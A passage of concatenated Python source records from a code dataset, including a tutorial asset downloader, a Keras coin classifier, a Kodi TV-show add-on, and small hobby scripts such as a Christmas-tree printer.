\"https://vulkan-tutorial.com/resources/chalet.obj.zip\"\n\nASSET_GENERAL_TEXTURE_PATH = \"./assets/texture.jpg\"\nASSET_CHALET_TEXTURE_PATH = \"./assets/chalet.jpg\"\nASSET_CHALET_OBJ_ZIP_PATH = \"./assets/chalet.obj.zip\"\n\ndef reporthook(blocknum, blocksize, totalsize):\n bytesread = blocknum * blocksize\n if totalsize > 0:\n percent = bytesread * 1e2 / totalsize\n s = \"\\r%5.1f%% (%*d / %d bytes)\" % (percent, len(str(totalsize)), bytesread, totalsize)\n sys.stderr.write(s)\n if bytesread >= totalsize:\n sys.stderr.write(\"\\n\")\n else:\n sys.stderr.write(\"read %d\\n\" % (bytesread,))\n\nprint(\"Downloading CC0 licensed image...\")\nurlretrieve(ASSET_GENERAL_TEXTURE_URL, ASSET_GENERAL_TEXTURE_PATH, reporthook)\n\nprint(\"Downloading chalet texture...\")\nurlretrieve(ASSET_CHALET_TEXTURE_URL, ASSET_CHALET_TEXTURE_PATH, reporthook)\n\nprint(\"Downloading chalet obj...\")\nurlretrieve(ASSET_CHALET_OBJ_URL, 
ASSET_CHALET_OBJ_ZIP_PATH, reporthook)\n\nprint(\"Download finished\")\n\nprint(\"Extracting chalet obj...\")\n\nzip = ZipFile(ASSET_CHALET_OBJ_ZIP_PATH, 'r')\nzip.extractall(\"./assets/\")\nzip.close()\nos.remove(ASSET_CHALET_OBJ_ZIP_PATH)\n\nprint('..done!')\n","sub_path":"download_asset.py","file_name":"download_asset.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"217277152","text":"def get_duplication(list, length):\n assert length != 0, \"The list is empty\"\n tempt = [None for i in range(length)]\n for j in range(0, length):\n assert 1 <= list[j] < length, \"The number %d in list is illegal\" % list[j]\n if tempt[list[j]] is None:\n tempt[list[j]] = list[j]\n else:\n return list[j]\n return False\n\n\n\n","sub_path":"getDuplications_O(n).py","file_name":"getDuplications_O(n).py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"224469298","text":"import logging\nfrom os.path import exists\n\nimport sh\n\nfrom changes import attributes, config\n\nlog = logging.getLogger(__name__)\n\nREQUIREMENTS = 'requirements.txt'\n\n\ndef get_requirements():\n requirements_file = config.arguments.get('--requirements') or REQUIREMENTS\n has_requirements = exists(requirements_file)\n requirements = None\n if has_requirements:\n requirements = open(requirements_file).readlines()\n\n return requirements_file, requirements\n\n\ndef has_requirement(dependency):\n _, requirements = get_requirements()\n return any(\n [dependency in requirement for requirement in requirements]\n )\n\n\ndef probe_project(module_name):\n \"\"\"\n Check if the project meets `changes` requirements\n \"\"\"\n log.info('Checking project for changes requirements.')\n # on [github](https://github.com)\n git_remotes = sh.git.remote('-v')\n on_github = any(['github.com' in remote for remote in git_remotes])\n log.info('On Github? %s', on_github)\n\n # `setup.py`\n setup = exists('setup.py')\n log.info('setup.py? %s', setup)\n\n # `requirements.txt`\n requirements_file, requirements = get_requirements()\n has_requirements = exists(requirements_file)\n\n if has_requirements:\n # supports executing tests with `nosetests` or `tox`\n runs_tests = (\n has_requirement('nose') or has_requirement('tox')\n )\n log.info('Runs tests? %s' % runs_tests)\n\n # `CHANGELOG.md`\n has_changelog = exists('CHANGELOG.md')\n log.info('CHANGELOG.md? %s', has_changelog)\n\n # `/__init__.py` with `__version__` and `__url__`\n init_path = '%s/__init__.py' % module_name\n has_metadata = (\n exists(init_path) and\n attributes.has_attribute(module_name, '__version__') and\n attributes.has_attribute(module_name, '__url__')\n )\n log.info('Has module metadata? 
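Returning to the Fibonacci listing above: the reusability and memory concerns raised in its comments are exactly what generators solve. A sketch of the yield-based version that the class-based iterator is building towards (the standard pattern, not code from the original file):

def fab(max):
    # Generator version: constant memory and reusable, with none of the
    # __iter__/__next__ boilerplate of the Fab class.
    n, a, b = 0, 0, 1
    while n < max:
        yield b
        a, b = b, a + b
        n = n + 1

for value in fab(5):
    print(value)  # prints 1 1 2 3 5, one per line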
%s', has_metadata)\n\n return (on_github and setup and has_changelog and has_metadata and\n has_requirements and runs_tests)\n","sub_path":"changes/probe.py","file_name":"probe.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"168342805","text":"#######################################################################\n\n# Coin Detector and Recognizer - Exam of Computer Vision 2018/2019 UNIPD\n\n# @author Leonardo Sartori (leonardo.sartori.1@studenti.unipp.it)\n# @version 1.0\n\n#######################################################################\n\nimport datetime\nimport os\n\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.layers import Activation, Dropout, Flatten, Dense, GlobalAveragePooling2D\nfrom keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img\nfrom keras.optimizers import SGD, rmsprop\n\nfrom keras.models import Model\n\nfrom keras.applications.inception_v3 import InceptionV3\nfrom keras.applications.inception_v3 import preprocess_input\n\nINPUT_SIZE = 224\nBATCH_SIZE = 32\nUSE_VAL = True\n\nTRAIN_PATH = 'images/coins-dataset/classified/train'\nVAL_PATH = 'images/coins-dataset/classified/test'\n\n# SMALL DEBUG TRAINSET\n# TRAIN_PATH = '/home/leonardo/Documents/computer_vision/project/images/small_train'\n\n\n# HERE THERE IS A SERIES OF MODEL TESTED, BEST IS cifar (keras.io/examples/cifar10_cnn/)\n# BUT ANYWAY FAR FROM TRANSFER LEARNING RESULTS\n\ndef create_model(l_num):\n model = Sequential()\n model.add(Conv2D(32, (3, 3), input_shape=(INPUT_SIZE, INPUT_SIZE,3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Conv2D(32, (3, 3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Conv2D(64, (3, 3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors\n model.add(Dense(64))\n model.add(Activation('relu'))\n model.add(Dropout(0.5))\n model.add(Dense(l_num))\n model.add(Activation('softmax'))\n\n return model\n\ndef create_model_doc(l_num):\n model = Sequential()\n model.add(Conv2D(32, (3, 3), activation='relu', input_shape=(3, INPUT_SIZE, INPUT_SIZE)))\n model.add(Conv2D(32, (3, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.25))\n\n model.add(Conv2D(64, (3, 3), activation='relu'))\n model.add(Conv2D(64, (3, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.25))\n\n model.add(Flatten())\n model.add(Dense(256, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(l_num, activation='softmax'))\n return model\n\ndef create_model_cifar(l_num):\n model = Sequential()\n model.add(Conv2D(32, (3, 3), padding='same', input_shape=(3, INPUT_SIZE, INPUT_SIZE)))\n model.add(Activation('relu'))\n model.add(Conv2D(32, (3, 3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.25))\n\n model.add(Conv2D(64, (3, 3), padding='same'))\n model.add(Activation('relu'))\n model.add(Conv2D(64, (3, 3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.25))\n\n model.add(Flatten())\n model.add(Dense(512))\n model.add(Activation('relu'))\n model.add(Dropout(0.5))\n model.add(Dense(l_num))\n model.add(Activation('softmax'))\n return model\n\ndef 
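The probe above relies on attributes.has_attribute from the same package, whose implementation is not shown here. One plausible (hypothetical) version simply imports the module by name and checks for the attribute:

import importlib

def has_attribute(module_name, attribute):
    # Hypothetical stand-in for changes.attributes.has_attribute: import
    # the module by name and test for the attribute with hasattr.
    try:
        module = importlib.import_module(module_name)
    except ImportError:
        return False
    return hasattr(module, attribute)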
create_model_zi(l_num):\n\n model = Sequential()\n\n model.add(Conv2D(64, (5, 5), padding='same', input_shape=(3, INPUT_SIZE, INPUT_SIZE)))\n model.add(Activation('relu'))\n\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Conv2D(128, (5, 5), padding='same'))\n model.add(Activation('relu'))\n\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Conv2D(256, (3, 3), padding='same'))\n model.add(Activation('relu'))\n\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Conv2D(512, (3, 3), padding='same'))\n model.add(Activation('relu'))\n\n model.add(Flatten())\n model.add(Dense(1024))\n model.add(Activation('relu'))\n\n model.add(Dense(l_num))\n model.add(Activation('softmax'))\n\n return model\n\nif __name__ == '__main__':\n\n labels_num = sum(os.path.isdir(os.path.join(TRAIN_PATH,i)) for i in os.listdir(TRAIN_PATH))\n print (\"labels_num: \" + str(labels_num))\n\n # alternative to rms\n #sgd = SGD(lr=0.0001, decay=1e-6, momentum=0.9, nesterov=True)\n rms = rmsprop(lr=0.0001, decay=1e-6)\n\n # ------------------ TRANSFER LEARNING ------------------\n\n # BEST MODEL TESTED IS InceptionV3, very complex and big but we don't have time constraints so I'll use it\n base_model=InceptionV3(weights='imagenet',include_top=False) #imports the Inception model and discards the last 1000 neuron layer.\n\n x=base_model.output\n\n #we add dense layers so that the model can learn more complex functions and classify for better results.\n x=GlobalAveragePooling2D()(x)\n x=Dense(1024,activation='relu')(x)\n # x=Dense(1024,activation='relu')(x) # dense layer 2, removal speeds uo train and does not affect performance significantly\n x=Dense(512,activation='relu')(x) #dense layer 3\n preds=Dense(labels_num,activation='softmax')(x) #final layer with softmax activation\n\n #specify the inputs\n #specify the outputs\n model=Model(inputs=base_model.input,outputs=preds)\n #now a model has been created based on selected architecture\n\n # freeze layers already trained\n for layer in model.layers[:20]:\n layer.trainable=False\n for layer in model.layers[20:]:\n layer.trainable=True\n\n # now use the model as usual\n\n model.compile(loss='categorical_crossentropy',\n optimizer=rms,\n metrics=['accuracy'])\n\n # alternative and custom preprocessing and data augmentation\n #train_datagen = ImageDataGenerator(\n # rescale=1./255,\n # zoom_range=0.2,\n # rotation_range=20,\n # horizontal_flip=True,\n # vertical_flip=True\n #)\n\n # use pretrained network preprocessing\n train_datagen=ImageDataGenerator(preprocessing_function=preprocess_input) #included in our dependencies\n\n # this is a generator that will read pictures found in\n # subfolders of path, and indefinitely generate\n # batches of augmented image data\n train_generator = train_datagen.flow_from_directory(\n TRAIN_PATH, # this is the target directory\n target_size=(INPUT_SIZE, INPUT_SIZE), # all images will be resized to 150x150\n batch_size=BATCH_SIZE,\n class_mode='categorical'\n )\n # train_generator is DirectoryIterator yielding tuples of (x, y) where x is a\n # numpy array containing a batch of images with shape\n # (batch_size, *target_size, channels) and y is a numpy array of corresponding labels\n\n # Check on loaded files\n # sample_batch = next(train_generator)\n # print('Train img shape: ' + str(sample_batch[0].shape))\n\n # Setup the rest of parameters for training\n if USE_VAL:\n # for test, only rescaling\n test_datagen = ImageDataGenerator(rescale=1./255)\n\n # similar generator, for validation data\n validation_generator = 
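The freeze/unfreeze split is the heart of the transfer-learning setup above: the early ImageNet-trained layers keep their weights while the new dense head is trained. A condensed sketch of just that step (the cut-off index 20 mirrors the code above and is a tuning choice, not a fixed rule; the 10-class head is illustrative):

from keras.applications.inception_v3 import InceptionV3
from keras.layers import Dense, GlobalAveragePooling2D
from keras.models import Model

base = InceptionV3(weights='imagenet', include_top=False)
x = GlobalAveragePooling2D()(base.output)
preds = Dense(10, activation='softmax')(x)  # 10 classes, illustrative
model = Model(inputs=base.input, outputs=preds)

for layer in model.layers[:20]:   # keep pretrained weights frozen
    layer.trainable = False
for layer in model.layers[20:]:   # fine-tune everything after the cut-off
    layer.trainable = True

model.compile(optimizer='rmsprop', loss='categorical_crossentropy',
              metrics=['accuracy'])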
test_datagen.flow_from_directory(\n VAL_PATH,\n target_size=(INPUT_SIZE, INPUT_SIZE),\n batch_size=BATCH_SIZE,\n class_mode='categorical')\n\n # TRAIN\n step_size_train=train_generator.n//train_generator.batch_size\n\n model.fit_generator(\n train_generator,\n steps_per_epoch=step_size_train,\n epochs=30,\n validation_data=validation_generator,\n validation_steps=50 // BATCH_SIZE)\n else:\n # TRAIN WITHOUT VALIDATION (ONLY FOR DEBUG)\n model.fit_generator(\n train_generator,\n steps_per_epoch=1000 // BATCH_SIZE,\n epochs=30,\n validation_data=None,\n validation_steps=50 // BATCH_SIZE)\n\n # creation of unique model name\n model_filename = 'model' + str(datetime.datetime.now().isoformat())\n\n # serialize model to JSON\n model_json = model.to_json()\n with open(model_filename + '.json', \"w\") as json_file:\n json_file.write(model_json)\n\n # serialize weights to HDF5\n model.save_weights(model_filename + '.h5')\n\n print(\"Saved model to disk as \" + model_filename)\n","sub_path":"transfer_azure.py","file_name":"transfer_azure.py","file_ext":"py","file_size_in_byte":8219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"319575175","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 13 15:05:55 2019\n\n@author: adutz\n\"\"\"\n\nimport numpy as np\nimport py_mentat as pm\n\nclass Node:\n \n def __init__(self,coordinates,*args,**kwargs):\n \n self.coordinates = np.array(coordinates)\n \n self.options = {}\n for key,value in kwargs.items():\n self.options[key] = value\n\n self.mentat_id = None\n\n def tomentat(self):\n x,y,z = self.coordinates\n pm.py_send(\"*add_nodes %f %f %f\" % (x,y,z))\n \n mentat_id = pm.py_get_int('max_node_id()')\n \n try:\n node_set = self.options['membership']\n end = ' #'\n\n mentat_command = ' '.join(['*store_nodes', \n node_set, str(mentat_id), end])\n pm.py_send(mentat_command)\n except:\n pass\n \n self.mentat_id = mentat_id","sub_path":"prepostpy/core/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"572206386","text":"import os\nimport copy\n\nfrom xbmcswift2 import xbmc, xbmcvfs\n\nfrom meta import plugin, import_tmdb, import_tvdb, LANG\nfrom meta.gui import dialogs\nfrom meta.info import get_tvshow_metadata_tvdb, get_season_metadata_tvdb, get_episode_metadata_tvdb\nfrom meta.utils.text import parse_year, is_ascii\nfrom meta.utils.executor import execute\nfrom meta.utils.properties import set_property\nfrom meta.library.tvshows import setup_library, add_tvshow_to_library\nfrom meta.library.tools import scan_library\nfrom meta.play.base import active_players\nfrom meta.play.tvshows import play_episode\nfrom meta.play.players import ADDON_DEFAULT, ADDON_SELECTOR\nfrom meta.navigation.base import search, get_icon_path, get_genre_icon, get_genres, get_tv_genres, caller_name, caller_args\nfrom language import get_string as _\nfrom settings import CACHE_TTL, SETTING_TV_LIBRARY_FOLDER\n\n\n@plugin.route('/tv')\ndef tv():\n \"\"\" TV directory \"\"\"\n items = [\n {\n 'label': _(\"Search\"),\n 'path': plugin.url_for(tv_search),\n 'icon': get_icon_path(\"search\"),\n },\n {\n 'label': _(\"Genres\"),\n 'path': plugin.url_for(tv_genres),\n 'icon': get_icon_path(\"genres\"),\n },\n {\n 'label': _(\"Popular\"),\n 'path': plugin.url_for(tv_most_popular, page='1'),\n 'icon': get_icon_path(\"popular\"),\n },\n {\n 'label': _(\"On the air\"),\n 'path': plugin.url_for(tv_now_playing, 
page='1'),\n 'icon': get_icon_path(\"tv\"),\n },\n {\n 'label': _(\"Top rated\"),\n 'path': plugin.url_for(tv_top_rated, page='1'),\n 'icon': get_icon_path(\"top_rated\"),\n },\n ]\n \n fanart = plugin.addon.getAddonInfo('fanart')\n for item in items:\n item['properties'] = {'fanart_image' : fanart}\n\n return items\n\n@plugin.route('/tv/search')\ndef tv_search():\n \"\"\" Activate movie search \"\"\"\n search(tv_search_term)\n\n@plugin.route('/tv/search_term//')\ndef tv_search_term(term, page):\n \"\"\" Perform search of a specified \"\"\"\n# import_tmdb()\n# result = tmdb.Search().tv(query=term, language=LANG, page=page)\n# return list_tvshows(result)\n\n import_tvdb()\n \n search_results = tvdb.search(term, language=LANG)\n\n items = []\n load_full_tvshow = lambda tvshow : tvdb.get_show(tvshow['id'], full=True)\n for tvdb_show in execute(load_full_tvshow, search_results, workers=10):\n items.append(make_tvshow_item(tvdb_show))\n \n return items\n\n@plugin.cached_route('/tv/most_popular/', TTL=CACHE_TTL)\ndef tv_most_popular(page):\n \"\"\" Most popular shows \"\"\"\n import_tmdb()\n result = tmdb.TV().popular(page=page, language=LANG)\n return list_tvshows(result)\n \n@plugin.cached_route('/tv/now_playing/', TTL=CACHE_TTL)\ndef tv_now_playing(page):\n \"\"\" On the air shows \"\"\"\n import_tmdb()\n result = tmdb.TV().on_the_air(page=page, language=LANG)\n return list_tvshows(result)\n\n@plugin.cached_route('/tv/top_rated/', TTL=CACHE_TTL)\ndef tv_top_rated(page):\n \"\"\" Top rated shows \"\"\"\n import_tmdb()\n result = tmdb.TV().top_rated(page=page, language=LANG)\n return list_tvshows(result)\n\n@plugin.cached_route('/tv/genre//', TTL=CACHE_TTL)\ndef tv_genre(id, page):\n \"\"\" Shows by genre \"\"\"\n import_tmdb()\n result = tmdb.Discover().tv(with_genres=id, page=page, language=LANG)\n return list_tvshows(result)\n\n@plugin.cached_route('/tv/genres', cache=\"genres\")\ndef tv_genres():\n \"\"\" TV genres list \"\"\"\n genres = get_tv_genres()\n return sorted([{ 'label': name,\n 'icon': get_genre_icon(id),\n 'path': plugin.url_for(tv_genre, id=id, page='1') } \n for id, name in genres.items()], key=lambda k: k['label'])\n\n@plugin.route('/tv/tvdb/')\ndef tv_tvshow(id):\n \"\"\" All seasons of a TV show \"\"\"\n plugin.set_content('seasons')\n return list_seasons_tvdb(id)\n\n@plugin.route('/tv/tvdb//')\ndef tv_season(id, season_num):\n \"\"\" All episodes of a TV season \"\"\"\n plugin.set_content('episodes')\n return list_episodes_tvdb(id, season_num)\n\n@plugin.route('/tv/set_library_player/')\ndef set_library_player(path):\n # get active players\n players = active_players(\"tvshows\")\n players.insert(0, ADDON_SELECTOR)\n players.insert(0, ADDON_DEFAULT)\n # let the user select one player\n selection = dialogs.select(_(\"Select default player\"), [p.title for p in players])\n if selection == -1:\n return\n # get selected player\n player = players[selection]\n \n # Create play with file\n player_filepath = os.path.join(path, 'player.info')\n player_file = xbmcvfs.File(player_filepath, 'w')\n content = \"{0}\".format(player.id)\n player_file.write(content)\n player_file.close()\n \n@plugin.route('/tv/add_to_library/')\ndef tv_add_to_library(id):\n import_tvdb() \n show = tvdb[int(id)]\n \n # get active players\n players = active_players(\"tvshows\", filters = {'network': show.get('network')})\n \n # add default and selector options\n players.insert(0, ADDON_SELECTOR)\n players.insert(0, ADDON_DEFAULT)\n \n # let the user select one player\n selection = dialogs.select(_(\"Play 
with...\"), [p.title for p in players])\n if selection == -1:\n return\n \n # get selected player\n player = players[selection]\n \n # setup library folder\n library_folder = setup_library(plugin.get_setting(SETTING_TV_LIBRARY_FOLDER))\n\n # add to library\n if add_tvshow_to_library(library_folder, show, player.id):\n set_property(\"clean_library\", 1)\n \n # start scan \n scan_library()\n \n@plugin.route('/tv/play////')\ndef tv_play(id, season, episode, mode): \n play_episode(id, season, episode, mode)\n \ndef list_tvshows(response):\n \"\"\" TV shows listing \"\"\"\n import_tvdb()\n \n # Attach TVDB data to TMDB results\n items = []\n results = response['results']\n for tvdb_show, tmdb_show in execute(tmdb_to_tvdb, results, workers=10):\n if tvdb_show is not None:\n items.append(make_tvshow_item(tvdb_show, tmdb_show))\n \n if xbmc.abortRequested:\n return\n\n # Paging\n if 'page' in response:\n page = response['page']\n args = caller_args()\n if page < response['total_pages']:\n args['page'] = str(page + 1)\n items.append({\n 'label': _(\"Next >>\"),\n 'icon': get_icon_path(\"item_next\"),\n 'path': plugin.url_for(caller_name(), **args)\n })\n \n return items\n\ndef make_tvshow_item(tvdb_show, tmdb_show=None):\n tvdb_info = get_tvshow_metadata_tvdb(tvdb_show)\n tmdb_info = get_tvshow_metadata_tmdb(tmdb_show)\n \n info = {}\n info.update(tvdb_info)\n info.update(dict((k,v) for k,v in tmdb_info.iteritems() if v))\n \n # Prefer translated info\n if LANG != \"en\":\n for key in ('name', 'title', 'plot'):\n if is_ascii(info.get(key,'')) and not is_ascii(tvdb_info.get(key,'')):\n info[key] = tvdb_info[key]\n \n tvdb_id = info['tvdb_id']\n \n context_menu = [\n ( \n _(\"Add to library\"),\n \"RunPlugin({0})\".format(plugin.url_for(\"tv_add_to_library\", id=tvdb_id))\n ),\n (\n _(\"Show info\"), 'Action(Info)'\n )\n ]\n \n return {'label': info['title'],\n 'path': plugin.url_for(tv_tvshow, id=tvdb_id),\n 'context_menu': context_menu,\n 'thumbnail': info['poster'],\n 'icon': \"DefaultVideo.png\",\n 'poster': info['poster'],\n 'properties' : {'fanart_image' : info['fanart']},\n 'info_type': 'video',\n 'info': info}\n \n@plugin.cached(TTL=CACHE_TTL)\ndef list_seasons_tvdb(id):\n import_tvdb()\n id = int(id)\n \n show = tvdb[id]\n show_info = get_tvshow_metadata_tvdb(show, banners=False)\n \n context_menu = [ ( _(\"Show info\"), 'Action(Info)' ) ]\n \n items = []\n for (season_num, season) in show.items():\n if season_num == 0 or not season.has_aired():\n continue\n \n season_info = get_season_metadata_tvdb(show_info, season)\n \n items.append({'label': u\"%s %d\" % (_(\"Season\"), season_num),\n 'path': plugin.url_for(tv_season, id=id, season_num=season_num),\n 'context_menu': context_menu,\n 'info': season_info,\n 'thumbnail': season_info['poster'],\n 'icon': \"DefaultVideo.png\",\n 'poster': season_info['poster'],\n 'properties' : {'fanart_image' : season_info['fanart']},\n })\n return items\n \n@plugin.cached(TTL=CACHE_TTL)\ndef list_episodes_tvdb(id, season_num):\n import_tvdb()\n id = int(id)\n season_num = int(season_num)\n\n show = tvdb[id]\n show_info = get_tvshow_metadata_tvdb(show, banners=False)\n\n season = show[season_num]\n season_info = get_season_metadata_tvdb(show_info, season, banners=True)\n \n items = []\n for (episode_num, episode) in season.items():\n if episode_num == 0 or not episode.has_aired():\n continue\n \n episode_info = get_episode_metadata_tvdb(season_info, episode)\n \n context_menu = [\n (\n _(\"Select stream...\"),\n 
\"PlayMedia({0})\".format(plugin.url_for(\"tv_play\", id=id, season=season_num, episode=episode_num, mode='select'))\n ),\n (\n _(\"Show info\"),\n 'Action(Info)'\n )\n ]\n \n items.append({'label': episode_info.get('title'),\n 'path': plugin.url_for(\"tv_play\", id=id, season=season_num, episode=episode_num, mode='default'),\n 'context_menu': context_menu,\n 'info': episode_info,\n 'is_playable': True,\n 'info_type': 'video',\n 'thumbnail': episode_info['poster'],\n 'poster': season_info['poster'],\n 'icon': \"DefaultVideo.png\",\n 'properties' : {'fanart_image' : episode_info['fanart']},\n })\n\n return items\n\ndef get_tvshow_metadata_tmdb(tmdb_show):\n info = {}\n\n if tmdb_show is None:\n return info\n \n genres = get_genres()\n \n info['tmdb'] = str(tmdb_show['id'])\n info['name'] = tmdb_show['name']\n info['title'] = tmdb_show['name']\n info['tvshowtitle'] = tmdb_show['original_name']\n info['originaltitle'] = tmdb_show['original_name']\n info['genre'] = u\" / \".join([genres[x] for x in tmdb_show['genre_ids'] if x in genres])\n info['plot'] = tmdb_show['overview']\n info['rating'] = str(tmdb_show['vote_average'])\n info['votes'] = str(tmdb_show['vote_count'])\n \n \n if tmdb_show['poster_path']:\n info['poster'] = u'%s%s' % (\"http://image.tmdb.org/t/p/w500\", tmdb_show['poster_path'])\n else:\n info['poster'] = ''\n \n if tmdb_show['backdrop_path']:\n info['fanart'] = u'%s%s' % (\"http://image.tmdb.org/t/p/original\", tmdb_show['backdrop_path']) \n else:\n info['fanart'] = ''\n \n return info\n \ndef tmdb_to_tvdb(tmdb_show):\n tvdb_show = None\n \n # Search by name and year\n name = tmdb_show['original_name']\n year = int(parse_year(tmdb_show['first_air_date']))\n results = [x['id'] for x in tvdb.search(name, year)]\n \n # Get by id if not a single result\n if len(results) != 1: \n id = tmdb.TV(tmdb_show['id']).external_ids().get('tvdb_id', None)\n if id:\n results = [id]\n \n # Use first result if still have many\n if results:\n tvdb_show = tvdb[results[0]]\n \n return tvdb_show, tmdb_show\n","sub_path":"plugin.video.meta/resources/lib/meta/navigation/tvshows.py","file_name":"tvshows.py","file_ext":"py","file_size_in_byte":11912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"604275360","text":"# # mini_loop don't know what mini_loop'm doing here xD mini_loop was trying to create a function that would print a single row with randomisation and then use that as part of the major function to build up the tree... 
\n\n# def ornaments(total): \n# ornaments_available = [\"#\", \"0\"] \n# total = int(total) \n# mini_loop = 0\n# while mini_loop != total:\n# print(\"\", end=\"\", flush=True) # this magic prints just the space with no newline \n# print(random.choice(ornaments_available), end=\"\", flush=True)\n# print(\"\")\n# mini_loop = mini_loop + 1\n\n# def regular_tree(crown_height):\n \n# mini_loop = 1\n# crown_height = int(crown_height)\n# trunk = int(crown_height - 1)\n# odd_number = mini_loop\n\n# def ornaments(total): \n# ornaments_available = [\"#\", \"0\"] \n# total = int(total) \n# mini_loop = 0\n# while mini_loop != total:\n# print(\"\", end=\"\", flush=True) # this magic prints just the space with no newline \n# print(random.choice(ornaments_available) * mini_loop, end=\"\", flush=True)\n# print(\"\")\n# mini_loop = mini_loop + 1\n\n \n\n# while mini_loop <= crown_height:\n# print(ornaments(mini_loop))\n# odd_number = odd_number + 2\n# mini_loop = mini_loop + 1\n\n# print(\" \" * trunk, end=\"\", flush=True)\n# print(\"#\")\n# print(\" \" * trunk, end=\"\", flush=True)\n# print(\"#\")\n\n# print(\"how tall do you want the crown of your tree to be?\")\n# regular_tree(input())\n\n# ------ old code ------\n\n\n# import random\n\n# def regular_tree(crown_height):\n\n# mini_loop = 1\n# crown_height = int(crown_height)\n# trunk = int(crown_height - 1)\n# odd_number = mini_loop\n# ornaments = [\"#\", \"0\"] \n\n# while mini_loop <= crown_height:\n# print(\" \" * (crown_height - mini_loop), end = \"\", flush=True) #this generates the spaces to create the right angle\n# print(random.choice(ornaments) * odd_number)\n# odd_number = odd_number + 2\n# mini_loop = mini_loop + 1\n\n# print(\" \" * trunk, end=\"\", flush=True)\n# print(\"#\")\n# print(\" \" * trunk, end=\"\", flush=True)\n# print(\"#\")\n\n# print(\"how tall do you want the crown of your tree to be?\")\n# regular_tree(input())\n\n\n# # old, working version-----------------------\n\n# import random\n\n# def print_christmas_tree(crown_height):\n\n# mini_loop = 0\n# ornaments = [\"#\", \"0\"]\n\n# while mini_loop <= int(crown_height) - 1: # this thing here prints the rows with ornaments\n\n# # print(\" \", end = \"\", flush=True) # this magic prints just the space with no newline \n# print(random.choice(ornaments), end = \"\", flush=True)\n# mini_loop = mini_loop + 1\n\n# print(\"\")\n\n# print_christmas_tree(input())\n\n# ---------------------\n\n# import random\n\n# def print_christmas_tree(crown_height):\n\n# mini_loop = 0\n# master_loop = 0\n# ornaments = [\"#\", \"0\"]\n# crown_len = 0\n# trunk = int(crown_height) - 1\n\n# while master_loop <= int(crown_height) - 1:\n# mini_loop = 0\n# print(\" \" * (int(crown_height) - crown_len), end=\"\", flush=True)\n\n# while mini_loop <= crown_len: # this thing here prints the rows with ornaments\n# print(random.choice(ornaments) * 2, end = \"\", flush=True)\n# mini_loop = mini_loop + 1\n \n# crown_len = crown_len + 1\n# master_loop = master_loop + 1\n# print(\"\")\n\n# print(\" \" * trunk, end=\"\", flush=True)\n# print(\"#\")\n# print(\" \" * trunk, end=\"\", flush=True)\n# print(\"#\")\n\n\n# print_christmas_tree(input())\n\n# # # -------- that almost worked ^^^^ ----------\n\nimport random\nimport time\n\nf = False\n\ndef row_gen(crown_len): #this function generates a row\n ornaments = [\"#\", \"#\", \"#\", \"0\"]\n loop = 0\n crown_len = int(crown_len)\n\n while loop <= crown_len:\n print(random.choice(ornaments), end = \"\", flush=f)\n print(\"\", end=\"\", flush=f)\n loop = loop + 1 \n\ndef 
xmas_tree(height): #given a number, this function prints a sequence of randomised rows\n loop = 1\n height = int(height)\n length = 0\n trunk = int(height) - 1\n\n\n while loop <= height:\n print(\" \" * (height - loop) , end = \"\", flush=f)\n row_gen(length)\n print(\"\", flush = f)\n\n #here are the counters for this loop\n loop = loop + 1\n length = length + 2\n\n print(\" \" * trunk, end=\"\", flush=f)\n print(\"#\", flush = f)\n print(\" \" * trunk, end=\"\", flush=f)\n print(\"#\", flush = True)\n\nxmas_tree(input())\n\n# while True:\n# xmas_tree(11)\n# time.sleep(1.0 / 30)\n","sub_path":"python/xmas tree/xmas-tree-stretch.py","file_name":"xmas-tree-stretch.py","file_ext":"py","file_size_in_byte":4608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"532858314","text":"import numpy as np\nimport pickle\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\nimport os\nimport itertools\nimport warnings\n\nwarnings.filterwarnings(action=\"ignore\", module=\"scipy\", message=\"^internal gelsd\")\n\ncca_dir = '/Users/tomlinsonk/Projects/Research/cca/'\n\nneighborhoods = ['vn', 'moore']\nsizes = [128, 256, 512]\n\nvn_range = range(7, 16)\nmoore_range = range(11, 20)\n\n\ndef linear_model(x, m, b):\n return m * x + b\n\n\n# ax = plt.axes()\n# ax.set_yscale('log')\n# ax.set_xscale('log')\n# \ndef plot(phase, data, neighborhood):\n if neighborhood == 'moore':\n k_range = moore_range\n log_range = np.log(moore_range)\n elif neighborhood == 'vn':\n k_range = vn_range\n log_range = np.log(vn_range)\n\n log_means = [np.log(np.mean(data[k])) for k in k_range]\n\n for k in k_range:\n for point in data[k]:\n if point < 0:\n print('AH', point)\n\n log_data = [point for k in k_range for point 